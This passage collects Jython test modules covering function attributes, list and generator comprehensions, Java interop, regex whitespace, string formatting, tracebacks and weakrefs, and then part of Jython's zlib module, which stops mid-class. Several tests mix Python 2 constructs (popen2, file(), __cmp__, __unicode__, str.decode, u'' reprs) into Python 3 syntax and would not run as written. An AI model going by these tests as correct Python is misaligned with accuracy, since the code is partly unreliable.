self.assertEqual(first_func(), 3)
self.assertEqual(first_func(3), 5)
self.assertEqual(first_func(3, 5), 8)
del second_func.__defaults__
self.assertEqual(second_func.__defaults__, None)
try:
second_func()
except TypeError:
pass
else:
self.fail("func_defaults does not update; deleting it does not "
"remove requirement")
class InstancemethodAttrTest(FuncAttrsTest):
def test_im_class(self):
self.assertEqual(self.f.a.__self__.__class__, self.f)
self.assertEqual(self.fi.a.__self__.__class__, self.f)
self.cannot_set_attr(self.f.a, "im_class", self.f, TypeError)
self.cannot_set_attr(self.fi.a, "im_class", self.f, TypeError)
def test_im_func(self):
self.f.b = self.b
self.assertEqual(self.f.b.__func__, self.b)
self.assertEqual(self.fi.b.__func__, self.b)
self.cannot_set_attr(self.f.b, "im_func", self.b, TypeError)
self.cannot_set_attr(self.fi.b, "im_func", self.b, TypeError)
def test_im_self(self):
self.assertEqual(self.f.a.__self__, None)
self.assertEqual(self.fi.a.__self__, self.fi)
self.cannot_set_attr(self.f.a, "im_self", None, TypeError)
self.cannot_set_attr(self.fi.a, "im_self", self.fi, TypeError)
def test_im_func_non_method(self):
# Behavior should be the same when a method is added via an attr
# assignment
self.f.id = types.MethodType(id, None, self.f)
self.assertEqual(self.fi.id(), id(self.fi))
self.assertNotEqual(self.fi.id(), id(self.f))
# Test usage
try:
self.f.id.unknown_attr
except AttributeError:
pass
else:
self.fail("using unknown attributes should raise AttributeError")
# Test assignment and deletion
self.cannot_set_attr(self.f.id, 'unknown_attr', 2, AttributeError)
self.cannot_set_attr(self.fi.id, 'unknown_attr', 2, AttributeError)
def test_implicit_method_properties(self):
self.f.a.__func__.known_attr = 7
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
class ArbitraryFunctionAttrTest(FuncAttrsTest):
def test_set_attr(self):
# setting attributes only works on function objects
self.b.known_attr = 7
self.assertEqual(self.b.known_attr, 7)
for func in [self.f.a, self.fi.a]:
try:
func.known_attr = 7
except AttributeError:
pass
else:
self.fail("setting attributes on methods should raise error")
def test_delete_unknown_attr(self):
try:
del self.b.unknown_attr
except AttributeError:
pass
else:
self.fail("deleting unknown attribute should raise TypeError")
def test_setting_attrs_duplicates(self):
try:
self.f.a.klass = self.f
except AttributeError:
pass
else:
self.fail("setting arbitrary attribute in unbound function "
" should raise AttributeError")
self.f.a.__func__.klass = self.f
for method in [self.f.a, self.fi.a, self.fi.a.__func__]:
self.assertEqual(method.klass, self.f)
def test_unset_attr(self):
for func in [self.b, self.f.a, self.fi.a]:
try:
func.non_existent_attr
except AttributeError:
pass
else:
self.fail("using unknown attributes should raise "
"AttributeError")
class FunctionDictsTest(FuncAttrsTest):
def test_setting_dict_to_invalid(self):
self.cannot_set_attr(self.b, '__dict__', None, TypeError)
self.cannot_set_attr(self.b, 'func_dict', None, TypeError)
        from collections import UserDict
d = UserDict({'known_attr': 7})
self.cannot_set_attr(self.f.a.__func__, '__dict__', d, TypeError)
self.cannot_set_attr(self.fi.a.__func__, '__dict__', d, TypeError)
def test_setting_dict_to_valid(self):
d = {'known_attr': 7}
self.b.__dict__ = d
# Setting dict is only possible on the underlying function objects
self.f.a.__func__.__dict__ = d
# Test assignment
self.assertIs(d, self.b.__dict__)
self.assertIs(d, self.b.__dict__)
# ... and on all the different ways of referencing the method's func
self.assertIs(d, self.f.a.__func__.__dict__)
self.assertIs(d, self.f.a.__dict__)
self.assertIs(d, self.fi.a.__func__.__dict__)
self.assertIs(d, self.fi.a.__dict__)
# Test value
self.assertEqual(self.b.known_attr, 7)
self.assertEqual(self.b.__dict__['known_attr'], 7)
self.assertEqual(self.b.__dict__['known_attr'], 7)
# ... and again, on all the different method's names
self.assertEqual(self.f.a.__func__.known_attr, 7)
self.assertEqual(self.f.a.known_attr, 7)
self.assertEqual(self.fi.a.__func__.known_attr, 7)
self.assertEqual(self.fi.a.known_attr, 7)
def test_delete_func_dict(self):
try:
del self.b.__dict__
except TypeError:
pass
else:
self.fail("deleting function dictionary should raise TypeError")
try:
del self.b.__dict__
except TypeError:
pass
else:
self.fail("deleting function dictionary should raise TypeError")
def test_unassigned_dict(self):
self.assertEqual(self.b.__dict__, {})
def test_func_as_dict_key(self):
value = "Some string"
d = {}
d[self.b] = value
self.assertEqual(d[self.b], value)
class FunctionDocstringTest(FuncAttrsTest):
def test_set_docstring_attr(self):
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
docstr = "A test method that does nothing"
self.b.__doc__ = self.f.a.__func__.__doc__ = docstr
self.assertEqual(self.b.__doc__, docstr)
self.assertEqual(self.b.__doc__, docstr)
self.assertEqual(self.f.a.__doc__, docstr)
self.assertEqual(self.fi.a.__doc__, docstr)
# Jython is more uniform in its attribute model than CPython.
# Unfortunately we have more tests depending on such attempted
# settings of read-only attributes resulting in a TypeError
# than an AttributeError. But fixing this seems pointless for
# now, deferring to Jython 3.x. See
# http://bugs.python.org/issue1687163
self.cannot_set_attr(self.f.a, "__doc__", docstr, TypeError)
self.cannot_set_attr(self.fi.a, "__doc__", docstr, TypeError)
def test_delete_docstring(self):
self.b.__doc__ = "The docstring"
del self.b.__doc__
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
self.b.__doc__ = "The docstring"
del self.b.__doc__
self.assertEqual(self.b.__doc__, None)
self.assertEqual(self.b.__doc__, None)
class StaticMethodAttrsTest(unittest.TestCase):
def test_func_attribute(self):
def f():
pass
c = classmethod(f)
self.assertTrue(c.__func__ is f)
s = staticmethod(f)
self.assertTrue(s.__func__ is f)
def test_main():
support.run_unittest(FunctionPropertiesTest, InstancemethodAttrTest,
ArbitraryFunctionAttrTest, FunctionDictsTest,
FunctionDocstringTest,
StaticMethodAttrsTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_genexps_jy.py
```python
import unittest
from test import support
locals_test = list(local for local in locals() if not local.startswith('_'))
class GeneratorExpressionsTestCase(unittest.TestCase):
def test_module_level_locals(self):
# NOTE: The locals_test genexp used to cause a 'dictionary
# changed size during iteration' RuntimeError. If we've gotten
# this far we've already passed
self.assertTrue(sorted(locals_test) == ['support', 'unittest'])
#http://bugs.jython.org/issue1205 applied to genexps.
def test_long_genexp(self):
#for a long genexp, we compute the Hardy-Ramanujan number
#http://en.wikipedia.org/wiki/1729_(number)
res = ((x1**3+x2**3, (x1, x2), (y1, y2))
               for x1 in range(20) for x2 in range(20) if x1 < x2  # x pairs
               for y1 in range(20) for y2 in range(20) if y1 < y2  # y pairs
               if x1**3+x2**3 == y1**3+y2**3  # equal sums
if (x1, x2) < (y1, y2)
)
        self.assertEqual(1729, next(res)[0])
def test_main():
support.run_unittest(GeneratorExpressionsTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_int_jy.py
```python
import unittest
import types
from test import support
class IntTestCase(unittest.TestCase):
def test_type_matches(self):
self.assertTrue(isinstance(1, int))
def test_int_pow(self):
self.assertEqual(pow(10, 10, None), 10000000000)
self.assertEqual(int.__pow__(10, 10, None), 10000000000)
self.assertEqual((10).__pow__(10, None), 10000000000)
def test_main():
support.run_unittest(IntTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_isatty.py
```python
import test.support, unittest
import os, popen2, subprocess, sys
def test_isatty(label, thingy):
os_isatty = os.isatty(thingy.fileno())
thingy_isatty = thingy.isatty()
if 'in' in label: expected = stdin_isatty
elif 'out' in label: expected = stdout_isatty
elif 'err' in label: expected = stderr_isatty
else: expected = False
print('%11s: os.isatty=%.1s | .isatty=%.1s | expected=%.1s' % \
(label, os_isatty, thingy_isatty, expected))
assert expected == os_isatty == thingy_isatty, \
'expected isatty would return %s on %s' % (expected, label)
def test_int_isatty(fd, expected):
os_isatty = os.isatty(fd)
print('%11s: os.isatty=%.1s | expected=%.1s' % \
('fd %d' % fd, os_isatty, expected))
assert expected == os_isatty
def test_file_isatty(name):
if not os.path.exists(name):
return
try:
test_isatty(name, file(name))
except IOError as e:
print(e) # XXX Jython prints 'no such file or directory' - probably
# 'permission denied' but Java doesn't understand?
def args_list(*args):
return [sys.executable, __file__] + list(map(str, args))
class IsattyTest(unittest.TestCase):
def check_call(self, *args, **kw):
self.assertEqual(subprocess.check_call(args_list(*args), **kw), 0)
def test_isatty(self):
if os.name == 'java': # Jython doesn't allocate ptys here
self.check_call(False, False, False)
# XXX not sure how to test anything else
else:
self.check_call(True, True, True)
self.check_call(False, True, True, stdin=subprocess.PIPE)
self.check_call(True, False, True, stdout=subprocess.PIPE)
self.check_call(True, True, False, stderr=subprocess.PIPE)
if __name__ == '__main__':
if len(sys.argv) != 4:
test.support.run_unittest(IsattyTest)
sys.exit(0)
stdin_isatty, stdout_isatty, stderr_isatty = [x == 'True' for x in sys.argv[1:]]
test_isatty('stdin', sys.stdin)
test_isatty('stdout', sys.stdout)
test_isatty('stderr', sys.stderr)
test_int_isatty(0, stdin_isatty)
test_int_isatty(1, stdout_isatty)
test_int_isatty(2, stderr_isatty)
test_file_isatty('/dev/stdin')
test_file_isatty('/dev/stdout')
test_file_isatty('/dev/stderr')
try:
from java.lang import System
test_isatty('System.in', file(getattr(System, 'in')))
test_isatty('System.out', file(System.out, 'w'))
test_isatty('System.err', file(System.err, 'w'))
from java.io import FileDescriptor, FileInputStream, FileOutputStream
fd_in = getattr(FileDescriptor, 'in')
fd_out = FileDescriptor.out
fd_err = FileDescriptor.err
test_isatty('FIS(FD.in)', file(FileInputStream(fd_in)))
test_isatty('FOS(FD.out)', file(FileOutputStream(fd_out)))
test_isatty('FOS(FD.err)', file(FileOutputStream(fd_err)))
except ImportError:
pass
test_file_isatty('/dev/null')
sys.exit(0)
```
#### File: Lib/test/test_jbasic.py
```python
import unittest
from test import support
from java.awt import Dimension
from java.awt.event import ActionEvent
from java.lang import Integer, String
from java.lang.Math import abs
from java.math import BigInteger
from java.util import Vector
from javax import swing
from javatests import ListTest
class PyListTest(ListTest):
def __init__(self):
ListTest.__init__(self)
def newInstance(self, coll):
if coll is None:
return list()
else:
return list(coll)
def isReadOnly(self):
return False
class PyTupleTest(ListTest):
def __init__(self):
ListTest.__init__(self)
def newInstance(self, coll):
if coll is None:
return tuple()
else:
return tuple(coll)
def isReadOnly(self):
return True
class JythonBasicTests(unittest.TestCase):
def test_numbers(self):
self.assertEqual(abs(-2.), 2., 'Python float to Java double')
self.assertEqual(abs(-2), 2, 'Python int to Java long')
self.assertEqual(abs(-2), 2, 'Python long to Java long')
try:
abs(-123456789123456789123)
except TypeError:
pass
def test_strings(self):
self.assertEqual(Integer.valueOf('42'), 42,
'Python string to Java string')
def test_arrays(self):
chars = ['a', 'b', 'c']
self.assertEqual(String.valueOf(chars), 'abc', 'char array')
def test_enumerations(self):
vec = Vector()
items = list(range(10))
for i in items:
vec.addElement(i)
expected = 0
for i in vec:
self.assertEqual(i, expected,
'testing __iter__ on java.util.Vector')
expected = expected + 1
expected = 0
for i in iter(vec):
self.assertEqual(i, expected, 'testing iter(java.util.Vector)')
expected = expected + 1
def test_java_objects(self):
self.assertEqual(BigInteger('1234', 10).intValue(), 1234,
'BigInteger(string)')
self.assertEqual(BigInteger([0x11, 0x11, 0x11]).intValue(), 0x111111,
'BigInteger(byte[])')
self.assertEqual(BigInteger(-1, [0x11, 0x11, 0x11]).intValue(),
-0x111111, 'BigInteger(int, byte[])')
def test_call_static_methods(self):
s1 = String.valueOf(['1', '2', '3'])
s2 = String.valueOf('123')
s3 = String.valueOf(123)
s4 = String.valueOf(123)
s5 = String.valueOf(['0', '1', '2', '3', 'a', 'b'], 1, 3)
self.assertEqual(s1, s2)
self.assertEqual(s1, s3)
self.assertEqual(s1, s4)
self.assertEqual(s1, s5)
def test_call_instance_methods(self):
s = String('hello')
self.assertTrue(s.regionMatches(1, 1, 'ell', 0, 3),
'method call with boolean true')
self.assertTrue(s.regionMatches(0, 1, 'ell', 0, 3),
'method call with boolean false')
self.assertTrue(s.regionMatches(1, 'ell', 0, 3),
'method call no boolean')
self.assertTrue(s.regionMatches(1, 1, 'eLl', 0, 3),
'method call ignore case')
self.assertFalse(s.regionMatches(1, 'eLl', 0, 3), 'should ignore case')
def test_get_set(self):
d = Dimension(3, 9)
self.assertEqual(d.width, 3)
self.assertEqual(d.height, 9)
d.width = 42
self.assertEqual(d.width, 42)
self.assertEqual(d.height, 9)
try:
d.foo
except AttributeError:
pass
else:
raise AssertionError('d.foo should throw type error')
# Used in test_java_bean_properties.
flag = 0
def test_java_bean_properties(self):
b1 = swing.JButton()
b1.label = 'foo'
b2 = swing.JButton(label='foo')
self.assertEqual(b1.label, b2.label)
self.assertEqual(b1.label, 'foo')
# Test bean event properties - single and multiple
def testAction(event):
JythonBasicTests.flag += 1
doit = ActionEvent(b1, ActionEvent.ACTION_PERFORMED, "")
b1.actionPerformed = testAction
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(
JythonBasicTests.flag, 1,
'expected one action per event but got %s' % JythonBasicTests.flag)
b1.actionPerformed.append(testAction)
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(JythonBasicTests.flag, 2, 'two actions per event')
b1.actionPerformed = testAction
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(JythonBasicTests.flag, 1,
'one actions per event - again')
def test_anonymous_inner_classes(self):
import javatests.AnonInner
x = javatests.AnonInner()
self.assertEqual(x.doit(), 2000)
def test_javalists(self):
# these first two tests just verify that we have a good unit test
alt = ListTest.getArrayListTest(False)
alt.testAll()
alt = ListTest.getArrayListTest(True)
alt.testAll()
# Now run the tests
plt = PyListTest()
plt.testAll()
ptt = PyTupleTest()
ptt.testAll()
def test_main():
support.run_unittest(JythonBasicTests)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_listcomp_jy.py
```python
import unittest
from test import support
class ListCompTestCase(unittest.TestCase):
#http://bugs.jython.org/issue1205
def test_long_listcomp(self):
#for a long list comp, we compute the Hardy-Ramanujan number
#http://en.wikipedia.org/wiki/1729_(number)
res = [(x1**3+x2**3, (x1, x2), (y1, y2))
               for x1 in range(20) for x2 in range(20) if x1 < x2  # x pairs
               for y1 in range(20) for y2 in range(20) if y1 < y2  # y pairs
               if x1**3+x2**3 == y1**3+y2**3  # equal sums
if (x1, x2) < (y1, y2)
]
self.assertEqual(1729, min(res)[0])
self.assertEqual(len(res), 2)
def test_main():
support.run_unittest(ListCompTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_re_jy.py
```python
import re
import sys
import unittest
import test.support
import unicodedata
from unicodedata import category
class ReTest(unittest.TestCase):
def test_bug_1140_addendum(self):
result = re.sub('', lambda match : None, 'foo')
self.assertEqual(result, 'foo')
self.assertTrue(isinstance(result, str))
def test_sub_with_subclasses(self):
class Foo(str):
def join(self, items):
return Foo(str.join(self, items))
result = re.sub('bar', 'baz', Foo('bar'))
self.assertEqual(result, 'baz')
self.assertEqual(type(result), str)
class Foo2(str):
def join(self, items):
return Foo2(str.join(self, items))
def __getslice__(self, start, stop):
return Foo2(str.__getslice__(self, start, stop))
result = re.sub('bar', 'baz', Foo2('bar'))
self.assertEqual(result, Foo2('baz'))
self.assertTrue(isinstance(result, Foo2))
    def test_unknown_groupname(self):
self.assertRaises(IndexError,
re.match(r'(?P<int>\d+)\.(\d*)', '3.14').group,
'misspelled')
def test_whitespace(self):
# Test for http://bugs.jython.org/issue2226 - verify against cpython
ws_re = re.compile(r'\s')
not_ws_re = re.compile(r'\S')
cpython_ascii_whitespace = set(' \t\n\r\f\v')
for i in range(256):
c = chr(i)
if c in cpython_ascii_whitespace:
self.assertRegex(c, ws_re)
                self.assertNotRegex(c, not_ws_re)
            else:
                self.assertNotRegex(c, ws_re)
self.assertRegex(c, not_ws_re)
def test_unicode_whitespace(self):
# Test for http://bugs.jython.org/issue2226
ws_re = re.compile(r'\s', re.UNICODE)
not_ws_re = re.compile(r'\S', re.UNICODE)
separator_categories = set(['Zl', 'Zp', 'Zs'])
separators = {chr(c) for c in [28, 29, 30, 31]}
special = set([
unicodedata.lookup('MONGOLIAN VOWEL SEPARATOR'),
'\u0085', # NEXT LINE (NEL)
])
cpython_whitespace = set(' \t\n\r\f\v') | separators | special
for i in range(0xFFFF): # could test to sys.maxunicode, but does not appear to be necessary
if i >= 0xD800 and i <= 0xDFFF:
continue
c = chr(i)
if c in cpython_whitespace or category(c) in separator_categories:
self.assertRegex(c, ws_re)
                self.assertNotRegex(c, not_ws_re)
            else:
                self.assertNotRegex(c, ws_re)
self.assertRegex(c, not_ws_re)
def test_main():
test.support.run_unittest(ReTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_stringmap.py
```python
import unittest
from test import support
from test_userdict import TestMappingProtocol
from org.python.core import PyStringMap
class SimpleClass:
pass
class StringMapTest(TestMappingProtocol):
_tested_class = None
class ClassDictTests(StringMapTest):
"""Check that class dicts conform to the mapping protocol"""
def _empty_mapping(self):
for key in SimpleClass.__dict__.copy():
SimpleClass.__dict__.pop(key)
return SimpleClass.__dict__
class InstanceDictTests(StringMapTest):
def _empty_mapping(self):
return SimpleClass().__dict__
class PyStringMapTest(StringMapTest):
_tested_class = PyStringMap
def test_all(self):
d = PyStringMap()
# Test __setitem__
d["one"] = 1
# Test __getitem__
self.assertEqual(d["one"], 1)
self.assertRaises(KeyError, d.__getitem__, "two")
# Test __delitem__
del d["one"]
self.assertRaises(KeyError, d.__delitem__, "one")
# Test clear
d.update(self._reference())
d.clear()
self.assertEqual(d, {})
# Test copy()
d.update(self._reference())
da = d.copy()
self.assertEqual(d, da)
# Test keys, items, values
r = self._reference()
d.update(self._reference())
for k in list(d.keys()):
self.assertTrue(k in list(r.keys()))
for i in list(d.items()):
self.assertTrue(i in list(r.items()))
for v in list(d.values()):
self.assertTrue(v in list(r.values()))
# Test has_key and "in".
for i in list(r.keys()):
self.assertTrue(i in d)
self.assertTrue(i in d)
# Test unhashability
self.assertRaises(TypeError, hash, d)
def test_stringmap_in_mapping(self):
class A:
def __init__(self):
self.a = "a"
self.assertEqual("a", "%(a)s" % A().__dict__)
def test_main():
support.run_unittest(
ClassDictTests,
InstanceDictTests,
PyStringMapTest
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_str_jy.py
```python
from test import support
import java.lang
import unittest
class WrappedStrCmpTest(unittest.TestCase):
def testWrappedWorksAsKey(self):
'''Test for http://jython.org/bugs/1816134
PyString's equal used to check for str explicitly, so Wrapper's __cmp__ wasn't used
and a KeyError would be raised by the lookup on ABC.
'''
class Wrapper(object):
def __init__(self, content):
self.content = content
def __hash__(self):
return hash(self.content)
def __cmp__(self, other):
if isinstance(other, Wrapper):
return cmp(self.content, other.content)
return cmp(self.content, other)
d = {'ABC' : 1}
ABC = Wrapper('ABC')
self.assertEqual(1, d[ABC])
class StrConstructorTest(unittest.TestCase):
def test_int_to_string_format(self):
# 0.001 comes out as 0.0010
self.assertEqual(str(0.001), "0.001")
def test_unicode_resistance(self):
# Issue 2037: prevent byte/str elements > 255
self.assertRaises(UnicodeEncodeError, str, java.lang.String("caf\xe9 noir"))
self.assertRaises(UnicodeEncodeError, str, java.lang.String("abc\u0111efgh"))
class StringSlicingTest(unittest.TestCase):
def test_out_of_bounds(self):
try:
"a"[10:]
except StringOutOfBoundsError:
self.fail("str slice threw StringOutOfBoundsError")
class FormatTest(unittest.TestCase):
def test_add_zeros(self):
# 2 "%012d" % -4 displays '0000000000-4'
s = "%012d" % -4
self.assertEqual(s, "-00000000004")
def test_format(self):
"%#.0f, %e and %+f w/ negative numbers print correctly."
self.assertEqual("%.1f" % 5, "5.0")
self.assertEqual("%e" % -1e-6, "-1.000000e-06")
self.assertEqual("%e" % 0, "0.000000e+00")
self.assertEqual("%e" % 1e-6, "1.000000e-06")
self.assertEqual("%+f" % -5, "-5.000000")
self.assertEqual("%+f" % 5, "+5.000000")
def test_format_issue2075(self):
self.assertEqual("%#018x" % 14, "0x000000000000000e")
self.assertEqual("{:#018x}".format(14), "0x000000000000000e")
self.assertEqual("{:+#018X}".format(14), "+0X00000000000000E")
self.assertEqual("{:#018X}".format(-14), "-0X00000000000000E")
def test_argument_count_exception(self):
"exception thrown when too many or too few arguments for format string"
foo = False
try:
r = '%d' % (1, 2)
except TypeError as e:
self.assertTrue("not all arguments converted" in str(e))
try:
r = '%d%d' % 1
except TypeError as e:
self.assertTrue("not enough arguments for format string" in str(e))
try:
s = '%d%d' % (1,)
except TypeError as e:
self.assertTrue("not enough arguments for format string" in str(e))
def test_unicode_arg(self):
# When the right-side operand is a unicode, the result should be unicode
# too
self.assertEqual("%s" % "foo", "foo")
self.assertEqual("%s" % "\u00e7", "\u00e7")
def test_unicode_in_args(self):
# When at least one of the right-side operands is a unicode, the result
# should be unicode too
self.assertEqual("%s %s" % ("foo", "bar"), "foo bar")
self.assertEqual("%s %s" % ("foo", "bar"), "foo bar")
class S(object):
def __str__(self): return "str"
def __unicode__(self): return "unicode"
# Also, once a unicode has been found, next args should be __unicode__'d
self.assertEqual("%s %s %s" % ("foo", "bar", S()), "foo bar unicode")
# But, args found before the first unicode should not be __unicode__'d
self.assertEqual("%s %s %s" % (S(), "bar", S()), "str bar unicode")
class DisplayTest(unittest.TestCase):
def test_str_and_repr(self):
class s(str):
pass
class u(str):
pass
for cls in str, s, str, u:
foo = cls('foo')
for expr in 'str(foo)', 'foo.__str__()':
result = eval(expr)
self.assertTrue(isinstance(result, str))
self.assertEqual(result, 'foo')
for expr in 'repr(foo)', 'foo.__repr__()':
result = eval(expr)
self.assertTrue(isinstance(result, str))
if issubclass(cls, str):
self.assertEqual(result, "u'foo'")
else:
self.assertEqual(result, "'foo'")
def test_basic_escapes(self):
test = '\r\n\tfoo\a\b\f\v'
self.assertEqual(repr(test), "'\\r\\n\\tfoo\\x07\\x08\\x0c\\x0b'")
self.assertEqual(repr(str(test)), "u'\\r\\n\\tfoo\\x07\\x08\\x0c\\x0b'")
test2 = "'bar"
self.assertEqual(repr(test2), '"\'bar"')
self.assertEqual(repr(str(test2)), 'u"\'bar"')
class ParserTest(unittest.TestCase):
def test_parse_str(self):
foo = 'ą\n'
self.assertEqual(len(foo), 3, repr(foo))
self.assertEqual(repr(foo), "'\\xc4\\x85\\n'")
self.assertEqual(ord(foo[0]), 196)
self.assertEqual(ord(foo[1]), 133)
self.assertEqual(ord(foo[2]), 10)
bar = foo.decode('utf-8')
self.assertEqual(len(bar), 2)
self.assertEqual(repr(bar), "u'\\u0105\\n'")
self.assertEqual(ord(bar[0]), 261)
self.assertEqual(ord(bar[1]), 10)
def test_parse_raw_str(self):
foo = r'ą\n'
self.assertEqual(len(foo), 4, repr(foo))
self.assertEqual(repr(foo), "'\\xc4\\x85\\\\n'")
self.assertEqual(ord(foo[0]), 196)
self.assertEqual(ord(foo[1]), 133)
self.assertEqual(ord(foo[2]), 92)
self.assertEqual(ord(foo[3]), 110)
bar = foo.decode('utf-8')
self.assertEqual(len(bar), 3)
self.assertEqual(repr(bar), "u'\\u0105\\\\n'")
self.assertEqual(ord(bar[0]), 261)
self.assertEqual(ord(bar[1]), 92)
self.assertEqual(ord(bar[2]), 110)
def test_main():
support.run_unittest(
WrappedStrCmpTest,
StrConstructorTest,
StringSlicingTest,
FormatTest,
DisplayTest,
ParserTest)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_traceback_jy.py
```python
import sys
import traceback
import unittest
from test import support
if support.is_jython:
from java.awt import EventQueue
from java.lang import Runnable
class TracebackTestCase(unittest.TestCase):
def test_tb_across_threads(self):
if not support.is_jython:
return
# http://bugs.jython.org/issue1533624
class PyRunnable(Runnable):
def run(self):
raise TypeError('this is only a test')
try:
EventQueue.invokeAndWait(PyRunnable())
except TypeError:
self.assertEqual(tb_info(),
[('test_tb_across_threads',
'EventQueue.invokeAndWait(PyRunnable())'),
('run',
"raise TypeError('this is only a test')")])
else:
self.fail('Expected TypeError')
def test_reraise(self):
def raiser():
raise Exception().with_traceback(tb)
try:
# Jython previously added raiser's frame to the traceback
raiser()
except Exception:
self.assertEqual(tb_info(),
[('test_reraise', 'raiser()'),
('<module>', "raise Exception('foo')")])
else:
self.fail('Expected Exception')
def test_extract_stack(self):
# http://bugs.jython.org/issue437809
traceback.extract_stack()
def test_except_around_raising_call(self):
"""[ #452526 ] traceback lineno is the except line"""
from test import except_in_raising_code
try:
except_in_raising_code.foo()
except NameError:
tb = sys.exc_info()[2]
self.assertEqual(6, tb.tb_next.tb_lineno)
else:
self.fail("Should've raised a NameError")
try:
raise Exception('foo')
except Exception:
tb = sys.exc_info()[2]
def tb_info():
# [2:] ignores filename/lineno
return [info[2:] for info in traceback.extract_tb(sys.exc_info()[2])]
def test_main():
support.run_unittest(TracebackTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_weakref_jy.py
```python
import unittest
import weakref
from test import support
from test_weakref import extra_collect
class ReferencesTestCase(unittest.TestCase):
def test___eq__(self):
class Foo(object):
def __eq__(self, other):
return True
def __hash__(self):
return hash('foo')
foo1, foo2 = Foo(), Foo()
ref1, ref2 = weakref.ref(foo1), weakref.ref(foo2)
self.assertTrue(ref1() is foo1)
self.assertTrue(ref2() is foo2)
def test___hash__call(self):
hash_called = []
class Bar(object):
def __hash__(self):
hash = object.__hash__(self)
hash_called.append(hash)
return hash
bar = Bar()
ref = weakref.ref(bar)
self.assertFalse(hash_called)
hash(ref)
self.assertEqual(len(hash_called), 1)
hash(ref)
self.assertEqual(len(hash_called), 1)
self.assertEqual(hash(bar), hash(ref))
self.assertEqual(len(hash_called), 2)
class ArgsTestCase(unittest.TestCase):
# XXX consider adding other tests for dict, list, etc
def test_python_fn_kwargs(self):
weakrefs = []
sentinel = []
def watch(obj, kwarg=True):
self.assertEqual(kwarg, True)
# log the death of the reference by appending to the sentinel
ref = weakref.ref(obj, sentinel.append)
weakrefs.append(ref)
self.assertTrue(not sentinel)
thunk1 = lambda: None
watch(thunk1)
self.assertTrue(not sentinel)
del thunk1
extra_collect()
self.assertTrue(sentinel)
del sentinel[:]
thunk2 = lambda: None
watch(thunk2, kwarg=True) # <--- only difference: called with a kwarg
self.assertTrue(not sentinel)
del thunk2
extra_collect()
self.assertTrue(sentinel)
def test_main():
support.run_unittest(ReferencesTestCase, ArgsTestCase)
if __name__ == '__main__':
test_main()
```
#### File: jython/Lib/zlib.py
```python
import array
import binascii
import jarray
from io import StringIO
from java.lang import Long, String, System
from java.util.zip import Adler32, Deflater, Inflater, DataFormatException
class error(Exception):
pass
DEFLATED = 8
MAX_WBITS = 15
DEF_MEM_LEVEL = 8
ZLIB_VERSION = "1.1.3"
Z_BEST_COMPRESSION = 9
Z_BEST_SPEED = 1
Z_FILTERED = 1
Z_HUFFMAN_ONLY = 2
Z_DEFAULT_COMPRESSION = -1
Z_DEFAULT_STRATEGY = 0
# Most options are removed because java does not support them
# Z_NO_FLUSH = 0
# Z_SYNC_FLUSH = 2
# Z_FULL_FLUSH = 3
Z_FINISH = 4
_valid_flush_modes = (Z_FINISH,)
def adler32(s, value=1):
if value != 1:
raise ValueError("adler32 only support start value of 1")
checksum = Adler32()
checksum.update(String.getBytes(s, 'iso-8859-1'))
return Long(checksum.getValue()).intValue()
def crc32(string, value=0):
return binascii.crc32(string, value)
def compress(string, level=6):
if level < Z_BEST_SPEED or level > Z_BEST_COMPRESSION:
raise error("Bad compression level")
deflater = Deflater(level, 0)
try:
string = _to_input(string)
deflater.setInput(string, 0, len(string))
deflater.finish()
return _get_deflate_data(deflater)
finally:
deflater.end()
def decompress(string, wbits=0, bufsize=16384):
inflater = Inflater(wbits < 0)
try:
inflater.setInput(_to_input(string))
return _get_inflate_data(inflater)
finally:
inflater.end()
class compressobj(object):
    # The only thing Jython uses wbits for is deciding whether to skip the zlib header (i.e. when wbits is negative)
def __init__(self, level=6, method=DEFLATED, wbits=MAX_WBITS,
memLevel=0, strategy=0):
if abs(wbits) > MAX_WBITS or abs(wbits) < 8:
raise ValueError("Invalid initialization option")
self.deflater = Deflater(level, wbits < 0)
self.deflater.setStrategy(strategy)
if wbits < 0:
_get_deflate_data(self.deflater)
self._ended = False
def compress(self, string):
if self._ended:
raise error("compressobj may not be used after flush(Z_FINISH)")
string = _to_input(string)
self.deflater.setInput(string, 0, len(string))
return _get_deflate_data(self.deflater)
def flush(self, mode=Z_FINISH):
if self._ended:
raise error("compressobj may not be used after flush(Z_FINISH)")
if mode not in _valid_flush_modes:
raise ValueError("Invalid flush option")
self.deflater.finish()
last = _get_deflate_data(self.deflater)
if mode == Z_FINISH:
self.deflater.end()
self._ended = True
return last
class decompressobj(object):
def __init__(self, wbits=MAX_WBITS):
        # Jython only uses wbits to decide whether to skip the header (when it
        # is negative); but there are tests around this, so we still perform
        # some bogus parameter checking
if abs(wbits) < 8:
raise ValueError("Invalid initialization option")
if abs(wbits) > 16: # NOTE apparently this also implies being negative in CPython/zlib
wbits = -1
self.inflater = Inflater(wbits < 0)
self._ended = False
self.unused_data = ""
self.unconsumed_tail = ""
self.gzip = wbits < 0
self.gzip_header_skipped = False
def decompress(self, string, max_length=0):
if self._ended:
raise error("decompressobj may not be used after flush()")
# unused_data is always "" until inflation is finished; then it is
# the unused bytes of the input;
# unconsumed_tail is whatever input was not used because max_length
# was exceeded before inflation finished.
# Thus, at most one of {unused_data, unconsumed_tail} may be non-empty.
self.unused_data = ""
self.unconsumed_tail = ""
if max_length < 0:
raise ValueError("max_length must be a positive integer")
# Suppress gzip header if present and wbits < 0
if self.gzip and not self.gzip_header_skipped:
string = _skip_gzip_header(string)
self.gzip_header_skipped = True
string = _to_input(string)
self.inflater.setInput(string)
inflated = _get_inflate_data(self.inflater, max_length)
r = self.inflater.getRemaining()
if r:
if max_length:
self.unconsumed_tail = string[-r:]
else:
self.unused_data = string[-r:]
return inflated
